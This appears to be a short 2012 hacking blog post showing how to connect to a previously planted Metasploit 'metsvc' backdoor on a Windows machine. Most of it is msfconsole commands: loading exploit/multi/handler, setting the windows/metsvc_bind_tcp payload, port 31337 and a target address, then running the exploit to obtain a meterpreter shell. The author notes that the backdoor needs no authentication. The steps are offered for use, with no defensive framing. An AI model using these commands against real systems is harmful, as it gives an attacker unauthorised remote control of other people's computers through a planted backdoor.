Wednesday, February 29, 2012

Interact With Metsvc Backdoor

To interact with the meterpreter backdoor service we've created before, we can use a multi_handler with a windows/metsvc_bind_tcp payload to connect with the backdoor. 
To remind you again, this backdoor require no authentication to connect. So it is a dangerous backdoor to use since anyone can use it too.

Ok, here's a way to connect to the metsvc backdoor we've created before.

- Load up your msfconsole

- Set the parameter as follows
msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf  exploit(handler) > set LPORT 31337
LPORT => 31337
msf  exploit(handler) > set RHOST 192.168.56.2
RHOST => 192.168.56.2

- Final checking.
msf  exploit(handler) > show options

- Exploit
msf  exploit(handler) > exploit

Immediately after you execute exploit command. A nice meterpreter shell will be available for us to be used..   :D

"the quieter you become, the more you are able to hear.."

0 comments:

Post a Comment